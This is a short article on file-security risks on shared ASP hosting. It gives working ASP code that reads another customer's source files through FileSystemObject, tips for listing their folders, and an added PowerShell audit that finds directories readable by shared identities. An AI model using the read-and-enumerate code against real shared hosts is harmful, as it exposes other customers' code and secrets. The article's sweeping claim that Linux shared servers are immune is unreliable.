
Security Risks on ASP Based Shared Servers

Security on shared Windows servers that support ASP is generally not very high. One simple problem with large consequences is file security.

Let's say user X can upload ASP pages to the directory /User/X. User Y has the same hosting package and can upload to /User/Y. Most hosts just create an FTP account for every user that points to their own directory. So far, so good: every user can upload their websites into their own directory.

But then the FileSystemObject comes into the picture. Let's say user X has a file /user/X/index.asp which contains all sorts of information, and no one but X is supposed to be able to read the code.

If you happen to be user Y and use the code below, you get a copy of index.asp from X's directory. On most Windows-based servers, the file is readable to all ASP pages.

The code:

<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set fi = fs.OpenTextFile(Server.MapPath("../X/index.asp"))
response.write fi.ReadAll
fi.close
Set fi = nothing
Set fs = nothing
%>

The explanation:

Set fs = CreateObject("Scripting.FileSystemObject")
This simply creates the object

Set fi = fs.OpenTextFile(Server.MapPath("../X/index.asp"))
Server.MapPath converts the relative path into a physical path on the server, and OpenTextFile opens that file.

response.write fi.ReadAll
This gets all the content of the file and displays it.

It is as simple as that, and that is where the danger lies.
When you have some more time you can experiment with the following items:

Set f = fs.GetFolder(Some Dir)
For Each sf in f.SubFolders ... next
For Each fi in f.Files ... next
Use this to get the content of directories if you do not know what is in them.

Just so you know, altering ASP pages not belonging to you is not allowed (in most countries, I assume). But there are also legal ways to use these pieces of code, like making a remote editor, to alter your ASP pages from everywhere.

You might be wondering if Linux servers have the same problem. Well, they don't. File security is much stricter on Linux-based systems. You can still browse around the files and directories on shared systems, but only if you have access to them.
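
The cross-directory read shown earlier works when user X's directory grants read access to an identity that user Y's ASP pages also run as. The following PowerShell audit for the host administrator is an added example, not code from the original article; the hosting root path and the list of shared identities are assumptions to adjust per server.

```powershell
# Added example: list customer directories that a shared identity can read.
# Assumptions (not from the article): the $HostingRoot layout and $Shared list.
param(
    [string]$HostingRoot = 'D:\User',   # hypothetical parent of \X, \Y, ...
    [string[]]$Shared = @(
        'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\IUSR', 'BUILTIN\IIS_IUSRS'
        # On older IIS, add the machine's own IUSR_<machine> account here.
    )
)

$fsr = [System.Security.AccessControl.FileSystemRights]
# ReadData (same bit as ListDirectory), plus GENERIC_READ (0x80000000) and
# GENERIC_ALL (0x10000000), which Get-Acl reports as raw numbers on some entries.
$readMask = [int]($fsr::ReadData) -bor [int]::MinValue -bor 0x10000000

function Get-SharedReadAce {
    # Returns the Allow entries on $Path that give a listed principal read access.
    param([string]$Path, [string[]]$Principals, [int]$Mask)
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights) -band $Mask) -ne 0 -and
        ($Principals -contains $_.IdentityReference.Value)
    }
}

# One output row per (customer directory, shared identity) pair that can read it.
Get-ChildItem -LiteralPath $HostingRoot -Directory | ForEach-Object {
    $dir = $_
    Get-SharedReadAce -Path $dir.FullName -Principals $Shared -Mask $readMask |
        ForEach-Object {
            [pscustomobject]@{
                Directory = $dir.FullName
                Identity  = $_.IdentityReference.Value
                Rights    = $_.FileSystemRights
                Inherited = $_.IsInherited
            }
        }
}
```

An empty result means no listed shared identity has read access at the top of any customer directory; rows marked as inherited point to an entry set on a parent folder rather than on the customer directory itself.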
